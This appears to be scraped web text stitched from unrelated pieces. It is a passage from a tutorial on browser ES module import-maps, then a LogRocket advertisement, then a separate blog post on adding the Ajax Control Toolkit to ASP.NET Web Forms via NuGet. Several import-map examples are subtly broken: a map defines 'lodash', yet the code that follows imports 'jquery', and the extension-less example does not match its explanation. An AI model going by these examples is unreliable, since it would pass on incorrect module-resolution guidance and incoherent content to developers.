Keep in mind that fetching and parsing modules in just the first step of loading modules in browsers. If you are interested in reading more in detail about the next steps, give this article a careful read.
But for us, we try to shed a bit of light on an aspect of ES module usage in browsers which is the usage of
import-maps to make the process of specifying module specifiers easier.
Why and how to use
import-maps?
In the construction phase of loading modules, there are two initial steps to take.
The first one is module resolution which is about figuring out where to download the module from. And the second step is actually downloading the module. This is where one of the biggest differences between modules in a browser context and a context like Node.js comes up. Since Node.js has access to the filesystem, its way of handling module resolution is different from the browser. That is why you can see something like this in a Node.js context:
const _lodash = require('lodash');
Also in a browser context with using a builder tool like Webpack, you would do something like this:
import * as _lodash from 'lodash';
In this example, the
'lodash' module specifier is known to the Node.js process because it has access to
filesystem or the packages distributed through npm package manager. But the browser can only accept URLs for the module specifier because the only mechanism for getting modules is to download them over the network. This was the case until a new proposal for ES modules was introduced, called
import-maps, to resolve this issue and bringing a more consistent look and feel between module usage in browsers and other tools and bundlers.
So the
import-maps define a map of module import names which allows developers to provide bare import specifiers like
import "jquery". If you use such an import statement in browsers today, it will throw because they are not treated as relative URLs and are explicitly reserved. Let’s see how it works.
By providing the attribute
type="importmap" on a script tag, you can define this map and then define a series of bare import names and a relative or absolute URL. Remember that if you are specifying a relative URL such as the example below, the location of that file should be relative to the file where the
import-maps is defined, which is
index.html in this instance:
// index.html <script type="importmap"> { "imports": { "lodash": "/node_modules/lodash-es/lodash.js" } } </script>
After defining this map, you can directly import
lodash anywhere in your code:
import jQuery from 'jquery';
But if you did not use
import-maps, you have to do something like the code shown below, which is cumbersome as well as inconsistent with how modules are defined today with other tools:
import jQuery from "/node_modules/jQuery/index.js";
So it is clear that using
import-maps help to bring consistency with how modules are used today. Chances are if you are used to requiring or importing modules in the context of NodeJS or Webpack, some basic groundwork has been done for you already. Let’s explore a few of these scenarios and see how they are handled via
import-maps in browsers.
You have probably seen that sometimes the module specifier is used without the extension when used in Node.js. For example:
// requiring something.js file const something = require('something');
This is because, under the hood, Node.js or other similar tools are able to try different extensions for the module specifier you defined until they find a good match. But such a functionality is also possible via
import-maps when using ES modules in browsers. This is how you should define the
import-maps to achieve this:
{ "imports": { "lodash/map": "/node_modules/lodash/map.js" } }
As you can see, we are defining the name of module specifier without the
.js extension. This way we are able to import the module in two ways:
// Either this import map from "lodash/map" // Or import map from "lodash/map.js"
One could argue that the extension-less file import is a bit ambiguous, which is valid. I personally prefer to precisely define the file extension, even when defining module specifiers in Node.js or Webpack context. Additionally, if you want to adopt the extension-less strategy with
import-maps, you will be overwhelmed as you have to define the extra extension-less module specifier for each of the modules in a package and not only the top-level file. This could easily get out of hand and bring less consistency to your code.
It is common among libraries and packages distributed through npm to contain several modules that you can import into your code. For example, a package like
lodash contains several modules. Sometimes you want to import the top-level module and sometimes you might be interested in a specific module in a package. Here is how you might specify such a functionality using
import-maps:
{ "imports": { "lodash": "/node_modules/lodash/lodash.js", "lodash/": "/node_modules/lodash/" } }
By specifying a separate module specifier name as
lodash/ and mirroring the same thing in the address
/node_modules/lodash/, you are allowing for specific modules in the package to be imported with ease which will look something like this:
// You can directly import lodash import _lodash from "lodash"; // or import a specific moodule import _shuffle from "lodash/shuffle.js";
Conclusion
Together in this article, we have learned about the ES modules. We covered why modules are essential and how the community is moving towards using the standard way of handling them.
When it comes to using ES modules in browsers today, an array of questions such as old browser compatibility, and fallback handling, as well as the true place of ES modules, next to bundler and build tools, come to mind. I strongly think ES modules are here to stay, but their presence does not eliminate the need for bundlers and builders, because they serve other essential purposes such as dead code elimination, minifying, and tree shaking. As we already know, popular tools like Node.js are also adopting ES modules in newer versions.
ES modules have wide browser support currently. Some of the features around ES modules such as
dynamic import (allowing function based imports) as well as the
import.meta (supporting Node.js cases) are part of the JavaScript spec now. And as we explored,
import-maps is another great feature that would allow us to smooth over the differences between Node.js and browsers.
I can say with confidence the future looks bright for ES modules and their place in the JavaScript community.
Resources_1<<
LogRocket records console logs, page load times, stacktraces, slow network requests/responses with headers + bodies, browser metadata, and custom logs. Understanding the impact of your JavaScript code will never be easier!Try it for free. | https://blog.logrocket.com/es-modules-in-browsers-with-import-maps/ | CC-MAIN-2020-40 | refinedweb | 2,357 | 61.36 |
Here we will see how to calculate the remainder of array multiplication after dividing the result by n. The array and the value of n are supplied by the user. Suppose the array is like {12, 35, 69, 74, 165, 54} so the multiplication will be (12 * 35 * 69 * 74 * 165 * 54) = 19107673200. Now if we want to get the remainder after diving this by 47 it will be 14.
As we can see this problem is very simple. we can easily multiply the elements then by using modulus operator, it can get the result. But the main problem is when we calculate the multiplication, it may exceed the range of integer, or long also. So it may return some invalid results. To overcome this problem, we will follow this process.
begin mul := 1 for i in range 0 to size – 1, do mul := (mul * (arr[i] mod n)) mod n done return mul mod n end
#include<iostream> using namespace std; int multiplyRemainder(int arr[], int size, int n){ int mul = 1; for(int i = 0; i<size; i++){ mul = (mul * (arr[i] % n)) % n; } return mul % n; } int main(){ int arr[6] = {12, 35, 69, 74, 165, 54}; int size = 6; int n = 47; cout << "Remainder: " << multiplyRemainder(arr, size, n); }
Remainder: 14 | https://www.tutorialspoint.com/c-cplusplus-program-to-find-reminder-of-array-multiplication-divided-by-n | CC-MAIN-2021-49 | refinedweb | 214 | 67.49 |
PMFAULT(3) Library Functions Manual PMFAULT(3)
__pmFaultInject, PM_FAULT_POINT, PM_FAULT_CHECK, __pmFaultSummary - Fault Injection Infrastracture for QA
#include <pcp/pmapi.h> #include <pcp/impl.h> #include <pcp/fault.h> void __pmFaultInject(const char *ident, int class); void __pmFaultSummary(FILE *f); PM_FAULT_POINT(ident, class); PM_FAULT_CHECK(class); cc -DPM_FAULT_INJECTION=1 ... -lpcp_fault
As part of the coverage-driven changes to QA in PCP 3.6, it became apparent that we needed someway to exercise the ``uncommon'' code paths associated with error detection and recovery. The facilities described below provide a basic fault injection infrastructure (for libpcp only at this stage, alhough the mechanism is far more general and could easily be extended). A special build is required to create libpcp_fault and the associated <pcp/fault.h> header file. Once this has been done, new QA applications may be built with -DPM_FAULT_INJECTION=1 and/or existing applications can be exercised in presence of fault injection by forcing libpcp_fault to be used in preference to libpcp as described below. In the code to be tested, __pmFaultInject defines a fault point at which a fault of type class may be injected. ident is a string to uniquely identify the fault point across all of the PCP source code, so something like "libpcp/" __FILE__ ":<number>" works just fine. The ident string also determines if a fault will be injected at run- time or not - refer to the RUN-TIME CONTROL section below. class selects a failure type, using one of the following defined values (this list may well grow over time): PM_FAULT_ALLOC Will cause the next call to malloc(3), realloc(3) or strdup(3) to fail, returning NULL and setting errno to ENOMEM. We could extend the coverage to all of the malloc-related routines, but these three are sufficient to cover the vast majority of the uses within libpcp. PM_FAULT_PMAPI Will cause the next call to a PMAPI routine to fail by returning the (new) PCP error code PM_ERR_FAULT. At the this stage, only __pmRegisterAnon(3) has been instrumented as a proof of concept for this part of the facility. PM_FAULT_TIMEOUT Will cause the next call to an instrumented routine to return the PCP error code PM_ERR_TIMEOUT. At this stage, only __pmGetPDU(3) has been instrumented to check for this class of fault injection. To allow fault injection to co-exist within the production source code, PM_FAULT_POINT is a macro that emits no code by default, but when PM_FAULT_INJECTION is defined this becomes a call to __pmFaultInject. Throughout libpcp we use PM_FAULT_POINT and not __pmFaultInject so that both libpcp and libpcp_fault can be built from the same source code. Similarly, the macro PM_FAULT_CHECK emits no code unless PM_FAULT_INJECTION is defined, in which case if a fault of type class has been armed with __pmFaultInject then, the enclosing routine will trigger the associated error behaviour. For the moment, this only works for the following class types: PM_FAULT_PMAPI The enclosing routine will return immediately with the value PM_ERR_FAULT - this assumes the enclosing routine is of type int foo(...) like all of the PMAPI routines. PM_FAULT_TIMEOUT The enclosing routine will return immediately with the value PM_ERR_TIMEOUT - this assumes the enclosing routine is of type int foo(...) like all of the PMAPI routines. A summary of fault points seen and faults injected is produced on stdio stream f by __pmFaultSummary. Additional tracing (via -Dfault and DBG_TRACE_FAULT) and a new PMAPI error code (PM_ERR_FAULT) are also defined, although these will only ever be seen or used in libpcp_fault. If DBG_TRACE_FAULT is set the first time __pmFaultInject is called, then __pmFaultSummary will be called automatically to report on stderr when the application exits (via atexit(3)). Fault injection cannot be nested. Each call to __pmFaultInject clears any previous fault injection that has been armed, but not yet executed. The fault injection infrastructure is not thread-safe and should only be used with applications that are known to be single-threaded.
By default, no fault injection is enabled at run-time, even when __pmFaultInject is called. Faults are selectively enabled using a control file, identified by the environment variable $PM_FAULT_CONTROL; if this is not set, no faults are enabled. The control file (if it exists) is read the first time __pmFaultInject is called, and contains lines of the form: ident op number that define fault injection guards. ident is a fault point string (as defined by a call to __pmFaultInject, or more usually the PM_FAULT_POINT macro). So one needs access to the libpcp source code to determine the available ident strings and their semantics. op is one of the C-style operators >=, >, ==, <, <=, != or % and number is an unsigned integer. op number is optional and the default is >0 The semantics of the fault injection guards are that each time __pmFaultInject is called for a particular ident, a trip count is incremented (the first trip is 1); if the C-style expression tripcount op number has the value 1 (so true for most ops, or the remainder equals 1 for the % op), then a fault of the class defined for the fault point associated with ident will be armed, and executed as soon as possible. Within the control file, blank lines are ignored and lines beginning with # are treated as comments. For an existing application linked with libpcp fault injection may still be used by forcing libpcp_fault to be used in the place of libpcp. The following example shows how this might be done. $ export PM_FAULT_CONTROL=/tmp/control $ cat $PM_FAULT_CONTROL # ok for 2 trips, then inject errors libpcp/events.c:1 >2 $ export LD_PRELOAD=/usr/lib/libpcp_fault.so $ pmevent -Dfault -s 3 sample.event.records host: localhost samples: 3 interval: 1.00 sec sample.event.records[fungus]: 0 event records __pmFaultInject(libpcp/events.c:1) ntrip=1 SKIP sample.event.records[bogus]: 2 event records 10:46:12.413 --- event record [0] flags 0x1 (point) --- sample.event.param_string "fetch #0" 10:46:12.413 --- event record [1] flags 0x1 (point) --- sample.event.param_string "bingo!" __pmFaultInject(libpcp/events.c:1) ntrip=2 SKIP sample.event.records[fungus]: 1 event records 10:46:03.416 --- event record [0] flags 0x1 (point) --- __pmFaultInject(libpcp/events.c:1) ntrip=3 INJECT sample.event.records[bogus]: pmUnpackEventRecords: Cannot allocate memory __pmFaultInject(libpcp/events.c:1) ntrip=4 INJECT sample.event.records[fungus]: pmUnpackEventRecords: Cannot allocate memory __pmFaultInject(libpcp/events.c:1) ntrip=5 INJECT sample.event.records[bogus]: pmUnpackEventRecords: Cannot allocate memory === Fault Injection Summary Report === libpcp/events.c:1: guard trip>2, 5 trips, 3 faults
Refer to the PCP and PCP QA source code. src/libpcp/src/derive.c uses PM_FAULT_CHECK. src/libpcp/src/err.c and src/libpcp/src/events.c use PM_FAULT_POINT. src/libpcp/src/fault.c contains all of the the underlying implementation. src/libpcp_fault contains the recipe and Makefile for creating and installing libpcp_fault and <pcp/fault.h>. QA/477 and QA/478 show examples of control file use.
PM_FAULT_CONTROL Full path to the fault injection control file. LD_PRELOAD Force libpcp_fault to be used in preference to libpcp.
PMAPI(3)
Some non-recoverable errors are reported on stderr.FAULT(3) | http://man7.org/linux/man-pages/man3/pmfault.3.html | CC-MAIN-2017-22 | refinedweb | 1,177 | 56.96 |
In this months column, we discuss a medley of topics including solving cognitive intelligence puzzles, and how Python is getting used widely in AI and Natural Language Processing.
For the past few months, we have been discussing information retrieval and Natural Language Processing (NLP), along with the algorithms associated with them. In this months column, we take a break from that discussion to look at some of the questions I have been getting from our readers recently. Given that we generally discuss coding problems, some readers have asked me whether I can discuss some puzzles. So instead of discussing math puzzles, I thought it may be interesting to try out something that tests our cognitive intelligence capabilities. Here is the first puzzle, which initially appears quite simple, but many people, including college graduates, seem to get it wrong on their first try.
There are three people Andrew, Anne, and Bobby. Andrew is looking at Anne. Anne is looking at Bobby. Andrew is married but Bobby is not married. Now the question to you is: Is a married person looking at an unmarried person? Choose the correct answer from the following options:
(A) Yes (B) No (C) Cannot be determined
Most people tend to choose the answer (C). Do you think the answer is correct? If not, why not? First take a couple of minutes to think through your reply. Well, the correct answer is (A). The key point to note is that each person can be in either a married or unmarried state. We know that Andrew is married and that Bobby is not. The reason most folks choose (C) is because there is no information regarding the marital state of Anne. But remember that the question is not whether Anne is married or not. The actual question is whether a married person is looking at an unmarried person. Anne can either be married or unmarried. If she is married, then answer (A) is indeed a married person looking at an unmarried one since Bobby is unmarried. If Anne is unmarried, then too, (A) emerges as the correct answer since Andrew who is married, is looking at Anne who is unmarried. Hence the answer is (A) and not (C). The reason most people choose (C) is because they are poor in disjunctive reasoning, which requires all the different possibilities or outcomes associated with a given situation to be taken into account before arriving at a conclusion.
Here is another puzzle to exercise your brain. This being a simple puzzle, I would like you to answer this question very quickly, in your mind and without using pen and paper.
A bat and a ball cost $1.10. The bat costs one dollar more than the ball. How much does the ball cost?
The immediate answer that most people give is 10 cents. However, if you work it out with a bit more careful thought, if the ball costs 10 cents, this makes the cost of the bat as one dollar and 10 cents since the bat costs one dollar more than the ball. The total cost of both bat and ball would then be $1.20, which is incorrect since the total given in the puzzle is $1.10. With a little bit of careful thought, you will find that the cost of the ball is five cents and that of the bat is one dollar five cents, which makes the total $1.10. This problem is very simple as far as mathematics is concerned. But when asked to name the answer immediately, somehow most folks blurt out the answer as ten cents instead of as five cents. The reason for this cognitive dysfunction is because our quick thinking brain is deceived into coming up with an obvious answer. However, a little more careful thinking prevents this error of reasoning.
Here’s the third puzzle.
You are given four cards, with each card having a digit on one side and an alphabet on the other. The hypothesis you need to validate is that if a card has a vowel on one side, then it has an even number on the other side. The four cards are laid such that Card 1 shows A, Card 2 shows D, Card 3 shows 4 and Card 4 shows 7. You need to specify which of these four cards are needed to check whether this rule is true or not.
Most people give the answer as the cards containing A and 4. But this is incorrect. Can you figure out why? The correct answer is the cards containing A and 7. It is obvious why the A card needs to be checked. If Card A has an odd number on the other side, obviously the rule is incorrect. Why is it that Card 4 need not be checked? The reason is that if Card 4 contains a consonant on the other side, it still does not violate the rule. (If you disagree, think carefully about the rule that we are trying to verify here.) On the other hand, if Card 7 contains a vowel on its other side, then the rule is disproved. This is another example of how the short-cut heuristics employed by our brain to quickly jump to a solution can lead us to the wrong answer.
You may have been wondering why we are discussing cognitive intelligence puzzles in a column devoted for computer science. Computer science programming projects are littered with evidence where a poor choice or decision in the planning, requirements, implementation and testing phases has led to a costly debacle. Hence, it is all the more important for computer scientists to be able to reason effectively and be aware of the short-cut heuristics and illusions the human brain can come up with. I would like to suggest that our readers look up the book Thinking Fast and Slow by Daniel Kahneman, a Nobel Prize laureate. The book is an effective guide to the various heuristics and biases the human mind is prone to, and on how to become an effective decision maker.
Vivekanandan, one of our student readers, had asked me about libraries for AI and NLP algorithms. Given that we also had a few other readers asking about how to ramp up on NLTK (Natural Language Toolkit), I felt it would be good to have a short discussion on the Python libraries available for AI and NLP and how one can quickly ramp up on the same. This months article is being co-authored by one of our student readers, Ankith Subramanya from The International School, Bengaluru, as he shares his experience of ramping up on Python libraries for AI and NLP.
As computer science develops, it is exploring problems that arise in the real world. Artificial Intelligence (AI) and Natural Language Processing (NLP) are two fields that have great practical applications. AI is the science of making our machines intelligent, so that they can be utilised for a number of practical problems. AI has vast potential and can have a great impact on every aspect of our lives, from the household (robotic vacuum cleaners) to national defence (missiles). As AI is a vast topic, research in it involves several centralised fields such as reasoning, knowledge, planning and learning. One of these several fields is NLP, which is probably the most human-centric field in AI, in the sense that it involves the interaction between natural human languages and the computer. This can be broadly understood as human-computer interactions. The goal of research in this field is to make communication between humans and computers as natural and effortless as possible, as if a computer were a person.
Python is regarded by many as a simple yet powerful language. The reason for its simplicity and quickness can be attributed to features such as built-in high level data types and dynamic typing. Python is increasingly preferred for AI, NLP and data mining. Apart from the characteristic benefits that it offers to developers, the main reason for Pythons increasing preference is the vast number of tools and libraries that it offers. These can be broadly classified into general AI, machine learning, natural language and text processing, and neural networks. AMAI (Annals of Mathematics and Artificial Intelligence) is a library that includes a number of Python implementations of the algorithms from Russell and Norvigs Artificial Intelligence: A Modern Approach.
One fun library that you can look at is easyAI, which is a simple Python engine for two-player games involving AI. With this framework, you can create and play various games such as Tic-Tac-Toe and Connect4. The steps for setting up and installing easyAI along with a user manual with examples are provided at zulko.github.io/easyAI/. To create a two-player game with easyAI, you need to simply create a sub-class of the TwoPlayersGame class (from the easyAI class). Then, you must define a set of methods that specify the nature of your game. To start the game, create an object of your game and then call the play method.
One very effective Natural Language and Text Processing library that Python offers is the NLTK, which is a platform for building Python programs that process data from human language. It basically provides the tools and libraries required to work with NLP. To make use of NLTK, you must first install it and then install the NLTK library. Optional installs such as NumPy are recommended, but not necessary. The steps and links for installation can be found at. With the NLTK libraries, you can do many delightful things to a piece of text such as analyse the sentiments (positive or negative), tokenise (split the text into parts such as paragraphs, sentences or words), stem (remove and replace word suffixes to arrive at the common root form of the word), tag and chunk (recognise different words as nouns, verbs, etc), and a lot more.
You can make your own simple sentiment analysis software. The following trivial code example will give readers a brief idea of how to make it work.
import sys sentence = sys.stdin.read() # to get input from stdin tokens = nltk_work.tokenize(sentence) scorer = 0 #keep a score of how positive or negative the statement is for word in tokens: /* in the following if statements, we will be giving our own condition to assign a score depending on how negative or positive a word is, from a selected set of words. You can add more words or choose a different words. */ if word==good: scorer = scorer + 1 if word ==great: scorer = scorer + 2 if word ==bad: scorer = scorer 1 if word ==terrible: scorer = scorer -2 if scorer == 0: print neutral if scorer > 0 print positive if scorer < 0 print negative
The above example is very basic but to actually make software that can process the complexities of various real world texts, more rigorous algorithms and larger sets of data are used.
If you have any favourite programming questions/software topics that you would like to discuss on this forum, please send them to me, along with your solutions and feedback, at sandyasm_AT_yahoo_DOT_com. Till we meet again next month, happy programming.
Connect With Us | http://opensourceforu.com/2015/03/codesport-4/ | CC-MAIN-2016-50 | refinedweb | 1,870 | 61.16 |
Passing List as Command Line Argument in Python
In this tutorial, we will see how we can pass a Python list as a single argument in the command line shell of the system. We will be using the sys module to accomplish this. Let’s see more on this topic further.
List as Command Line Argument in Python
In order to get access to the arguments passed in the command line shell in Python we use sys.argv. The arguments in sys.argv are stored in the form of an array. The first element in the array contains the name of the Python file. The following elements are the arguments passed after the name of the file.
Have a look at the given program.
import sys for arg in sys.argv: print(arg)
Output:
C:\Users\Ranjeet Verma\Desktop>python args.py arg1 arg2 arg3 args.py arg1 arg2 arg3
As you can see, sys.argv contains the file name as its first element and then the following arguments as the next elements.. How do we do it?
The following example takes a list as a command line argument and prints individual elements using a loop. See the code and its output for a better understanding.
import sys for arg in sys.argv: print(arg) l = len(sys.argv[1]) li = sys.argv[1][1:l-1].split(',') print("The list elements are:") for el in li: print(el)
Output:
C:\Users\Ranjeet Verma\Desktop>python args.py [1,2,3,4] args.py [1,2,3,4] The list elements are: 1 2 3 4
Let’s try to understand the code. First, we take the list as a command line argument. We know it’s the second element (index 1) in the sys.argv array. Now we store everything from this argument in variable li except the brackets which are the first and last elements in the argument. Then we eliminate all the commas present. And hence we get the list that we can use in our program to do any kind of operation. Here, we print the elements.
Thank you and keep coding.
Also read: Python Command Line Arguments | https://www.codespeedy.com/passing-list-as-command-line-argument-in-python/ | CC-MAIN-2022-27 | refinedweb | 362 | 77.84 |
sh 0.107
Python subprocess wrapper
Python functions dynamically. ``sh`` helps you write shell scripts in
Python by giving you the good features of Bash (easy command calling, easy
piping) with all the power and flexibility of Python.
```python
from sh import ifconfig
print ifconfig("eth0")
```
``sh`` is not a collection of system commands implemented in Python.
# Getting
$> pip install sh
# Usage
The easiest way to get up and running is to import sh
directly or import your program from sh:
```python
import sh
print sh.ifconfig("eth0")
from sh import ifconfig
print ifconfig("eth0")
```
A less common usage pattern is through ``sh`` Command wrapper, which takes a
full path to a command and returns a callable object. This is useful for
programs that have weird characters in their names or programs that aren't in
your $PATH:
```python
import sh
ffmpeg = sh.Command("/usr/bin/ffmpeg")
ffmpeg(movie_file)
```
The last usage pattern is for trying ``sh`` through an interactive REPL. By
default, this acts like a star import (so all of your system programs will be
immediately available as functions):
$> python sh sh
# resolves to "curl -o page.html --silent"
curl("", o="page.html", silent=True)
# or if you prefer not to use keyword arguments, this does the same thing:
curl("", "-o", "page.html", "--silent")
# resolves to "adduser amoffat --system --shell=/bin/bash --no-create-home"
adduser("amoffat", system=True, shell="/bin/bash", no_create_home=True)
# or
adduser("amoffat", "--system", "--shell", "/bin/bash", "--no-create-home")
```
## Piping
Piping has become function composition:
```python
# sort this directory by biggest file
print sort(du(glob("*"), "-sb"), "-rn")
# print the number of folders and files in /etc
print wc(ls("/etc", "-1"), "-l")
```
## Redirection
``sh``")
```
``sh`` sh
``sh`` is capable of "baking" arguments into commands. This is similar
to the stdlib functools.partial wrapper. An example can speak volumes:
```python
from sh sh import ssh
# calling whoami on the server. this is tedious to do if you're running
# any more than a few commands.
iam1 = ssh("myserver.com", "-p 1393", "whoami")
# wouldn't it be nice to bake the common parameters into the ssh command?
myserver = ssh.bake("myserver.com", p=1393)
print myserver # "/usr/bin/ssh myserver.com -p 1393"
# resolves to "/usr/bin/ssh myserver.com -p 1393 whoami"
iam2 = myserver.whoami()
assert(iam1 == iam2) # True!
```
Now that the "myserver" callable represents a baked ssh command, you
can call anything on the server easily:
`` sh import du
print du("*")
```
You'll get an error to the effect of "cannot access '\*': No such file or directory".
This is because the "\*" needs to be glob expanded:
```python
from sh
``sh`` automatically handles underscore-dash conversions. For example, if you want
to call apt-get:
```python
apt_get("install", "mplayer", y=True)
```
``sh``, ``sh`` raises an exception
based on that exit code. However, if you have determined that an error code
is normal and want to retrieve the output of the command without ``sh`` raising an
exception, you can use the "_ok_code" special argument to suppress the exception:
```python
output = sh.
- Downloads (All Versions):
- 308 downloads in the last day
- 14602 downloads in the last week
- 82111 downloads in the last month
-: sh-0.107.xml | https://pypi.python.org/pypi/sh/0.107 | CC-MAIN-2015-35 | refinedweb | 532 | 59.84 |
FNWiki:Editors
Create a new page
Instructions can be found from Create a new page -page.
Editing in general
To change a wiki entry, click on the "edit" link at the top of the page. This will bring you to the edit page. On this page you find a text box containing the wikitext: the editable source code from which the server produces the web page.
After adding to or changing the wikitext it is useful to press the "Show preview" button, which creates a preview but does not make the change publicly available.
You can make more changes and preview the page as many times as necessary. When you are satisfied with the layout and content - write a short description of your changes and then press the "Save page" button. The new page is now 'published', and available to the public.
Minor edits
When editing a page, a user has the option of marking the change".
Categories
All pages can be put in a category by adding a category tag, e.g.: [[Category:Category name]]
This provides a link to the appropriate category page, which is in the namespace "Category". Pages can be included in more than one category by adding multiple category tags. These links show up at the bottom of the page.
Nokia Developer has a list of Categories that we propose are used in this Wiki. If these terms are used, then the search function works across ALL the Nokia Developer website areas, and is therefore much more useful to users.
New categories can be created if it is felt that the provided list does not cover a particular subject. If there is enough demand for a new category, Nokia Developer will most likely integrate that into the site wide metadata.
Subcategories
Adding a category tag to a category page makes the edited category a subcategory of the tag's category.
For example, you could edit [[Category:Video]] and add the link [[Category:Multimedia]]. The Video category would then be a subcategory of the Multimedia category.
Category page
A category page is automatically created for each category in which a page is categorized. A category page consists of:
- editable text
- list of subcategories
- list of pages in the category, excluding subcategories and images
- list of images in the category with a generated thumbnail for each image
The items in the lists all link to the pages concerned; in the case of the images this applies both to the image itself and to the text below it (the name of the image).
The category page lists are ordered alphabetically based on the categorized pages title. If a page seems to be in the wrong place in the list, you can adjust it in the pages category tag by adding a sort key.
[[Category:category name|sort key]]
For example to add an article called Albert Einstein to the category "people" and have the article sorted by "Einstein, Albert" instead of "Albert Einstein". You would type "[[Category:People|Einstein, Albert]]".
Linking to a category page
If you want to link to a category page without the current page being added to it, you should use the link form [[:Category:Category name]]. Note the extra : before Category.
- MediaWiki Links to help with: | http://developer.nokia.com/community/wiki/index.php?title=FNWiki:Editors&oldid=173526 | CC-MAIN-2014-35 | refinedweb | 543 | 52.9 |
#!/usr/bin/python
'''
Author: loneferret of Offensive Security
Product: dreamMail e-mail client
Version: 4.6.9.2
Vendor Site:
Software Download:
Tested on: Windows XP SP3 Eng.
Tested on: Windows 7 Pro SP1 Eng.
dreamMail: Using default settings
E-mail client is vulnerable to stored XSS. Either opening or viewing the e-mail and you
get an annoying alert box etc etc etc.
Injection Point: Body
Gave vendor 7 days to reply in order to co-ordinate a release date.
Timeline:
16 Aug 2013: Tentative release date 23 Aug 2013
16 Aug 2013: Vulnerability reported to vendor. Provided complete list of payloads.
19 Aug 2013: Still no response. Sent second e-mail.
22 Aug 2013: Got a reply but not from development guy. He seems MIA according to contact.
No longer supported due to missing development guy.
23 Aug 2013: Still nothing.
24 Aug 2013: Release
'''
import smtplib, urllib2
payload = '''
'''
def sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = "From: hacker@offsec.local\n"
msg += "To: victim@offsec.local\n"
msg += 'Date: Today\r\n'
msg += "Subject: XSS payload\n"
msg += "Content-type: text/html\n\n"
msg += payload + "\r\n\r\n"
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()
username = "acker@offsec.local"
password = "123456"
dstemail = "victim@offsec.local"
frmemail = "acker@offsec.local"
smtpsrv = "xxx.xxx.xxx.xxx"
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)
'''
List of XSS types and different syntaxes to which the client is vulnerable.
Each payload will pop a message box, usually with the message "XSS" inside.
Paylaod-: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
Paylaod-:
Paylaod-:
Paylaod-: | https://www.exploit-db.com/raw/27805 | CC-MAIN-2019-13 | refinedweb | 302 | 53.88 |
Angular UI TabsAngular UI Tabs
InstallInstall
$ npm install @pevil/ng-tabs
UsageUsage
ImportImport
First, import the provided module:
import { NgTabModule } from '@pevil/ng-tabs'; @NgModule({ imports: [NgTabModule] }) export class Module {}
Building a set of tabsBuilding a set of tabs
3 directives are provided:
- pvlTabGroup
- pvlTab
- pvlTabPanel
First, an example of how to use them together, with more detail below
<ul pvlTabGroup [tabPanel]="characterPanel"> <li pvlTab [tabId]="'a'"> View A <ng-template><a-component></a-component></ng-template> </li> <li pvlTab [tabId]="'b'"> View B <ng-template><b-component></b-component></ng-template> </li> <li pvlTab [tabId]="'c'"> View C <ng-template><img [src]="c" /></ng-template> </li> </ul> <div>some other optional content that maybe you want to place before the tab panel</div> <ng-template pvlTabPanel #</ng-template>
For a more concrete example, see here or here
pvlTabGroup Use this to define a group of tabs that belong together. Here, we're defining an
element as the group, where each
child with the pvlTab directive (in this case each
- element), is a part of this tabGroup.
The [tabPanel] input expects a reference to the panel where we want to render these tabs. The optional [initialTab] input expects a string matching the tabId of whichever tab should be displayed first. If none is provided, the first tab's contents will be the default.
pvlTab As described above, we want to apply the pvlTab directive to each element that describes a tab. In this case we have 3
- elements, where the tabs themselves will display [View A, View B, View C]. Each element with a pvlTab directive also uses an to define the data that should be rendered in the panel when the tab is selected.
The [tabId] input expects a string id, unique to the other tabs in this tab group.
Whichever tab is active will have the css class
.pvl-active-tabapplied to it
pvlTabPanel Apply this to an element, wherever you want the content defined by each tab to render. Also remember to grab a reference to the directive, in order to pass that as an input to the tabGroup directive (in our example, we did that with #putContentHere="pvlTabPanel")
Run local demo by:
- Cloning the repo
- Run
$ npm run build.all
cd demo
python3 -m http.server 4300
- open localhost:4300 in a browser | https://www.npmjs.com/package/@pevil/ng-tabs | CC-MAIN-2022-27 | refinedweb | 387 | 54.66 |
The Ajax Control Toolkit is now available from NuGet. This makes it super easy to add the latest version of the Ajax Control Toolkit to any Web Forms application.
If you haven’t used NuGet yet, then you are missing out on a great tool which you can use with Visual Studio to add new features to an application. You can use NuGet with both ASP.NET MVC and ASP.NET Web Forms applications. NuGet is compatible with both Websites and Web Applications and it works with both C# and VB.NET applications.
For example, I habitually use NuGet to add the latest version of ELMAH, Entity Framework, jQuery, jQuery UI, and jQuery Templates to applications that I create. To download NuGet, visit the NuGet website at:
Imagine, for example, that you want to take advantage of the Ajax Control Toolkit RoundedCorners extender to create cross-browser compatible rounded corners in a Web Forms application..
Installing the Ajax Control Toolkit makes several modifications to your application. First, a reference to the Ajax Control Toolkit is added to your application. In a Web Application Project, you can see the new reference in the References folder:
Installing the Ajax Control Toolkit NuGet package also updates your Web.config file. The tag prefix ajaxToolkit is registered so that you can easily use Ajax Control Toolkit controls within any page without adding a @Register directive to the page.
<configuration> <system.web> <compilation debug="true" targetFramework="4.0" /> <pages> <controls> <add tagPrefix="ajaxToolkit" assembly="AjaxControlToolkit" namespace="AjaxControlToolkit" /> </controls> </pages> </system.web> </configuration>
You should do a rebuild of your application by selecting the Visual Studio menu option Build, Rebuild Solution so that Visual Studio picks up on the new controls (You won’t get Intellisense for the Ajax Control Toolkit controls until you do a build).
After you add the Ajax Control Toolkit to your application, you can start using any of the 40 Ajax Control Toolkit controls in your application (see for a reference for the controls).
<%@ Page <html xmlns=""> <head runat="server"> <title>Rounded Corners</title> <style type="text/css"> #pnl1 { background-color: gray; width: 200px; color:White; font: 14pt Verdana; } #pnl1_contents { padding: 10px; } </style> </head> <body> <form id="form1" runat="server"> <div> <asp:Panel <div id="pnl1_contents"> I have rounded corners! </div> </asp:Panel> <ajaxToolkit:ToolkitScriptManager <ajaxToolkit:RoundedCornersExtender </div> </form> </body> </html>
The page contains the following three controls:
- Panel – The Panel control named pnl1 contains the content which appears with rounded corners.
- ToolkitScriptManager – Every page which uses the Ajax Control Toolkit must contain a single ToolkitScriptManager. The ToolkitScriptManager loads all of the JavaScript files used by the Ajax Control Toolkit.
- RoundedCornersExtender – This Ajax Control Toolkit extender targets the Panel control. It makes the Panel control appear with rounded corners. You can control the “roundiness” of the corners by modifying the Radius property.
Notice that you get Intellisense when typing the Ajax Control Toolkit tags. As soon as you type <ajaxToolkit, all of the available Ajax Control Toolkit controls appear:
